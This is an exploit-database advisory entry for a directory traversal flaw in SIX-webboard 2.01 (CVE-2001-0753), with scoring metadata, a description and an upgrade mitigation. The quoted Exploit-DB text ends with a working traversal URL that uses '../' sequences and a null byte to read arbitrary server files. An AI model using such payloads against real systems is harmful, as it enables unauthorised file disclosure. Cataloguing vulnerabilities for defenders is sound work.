header-logo
Suggest Exploit
vendor:
Webboard
by:
SecurityFocus
8.8
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: Webboard
Affected Version From: 02.01
Affected Version To: 02.01
Patch Exists: YES
Related CWE: CVE-2001-0753
CPE: cpe:a:six:webboard:2.01
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2001

SIX-webboard 2.01 Directory Traversal

SIX-webboard 2.01 is vulnerable to a directory traversal attack due to insufficient input validation. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal sequences (e.g. ".." and "/") to the vulnerable web application. This can allow the attacker to view or retrieve files not normally accessible to them from the remote host.

Mitigation:

Upgrade to the latest version of SIX-webboard.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/3175/info

SIX-webboard 2.01 does not filter ".." and "/" from user input, allowing users to enter arbitrary values in order to view or retrieve files not normally accessible to them from the remote host. 

http://www.target.com/cgi-bin/webboard/generate.cgi/?content=../../../../../../../../../directory/file%00&board=boardsname

Navigation

Suggest Exploit

Services By CQR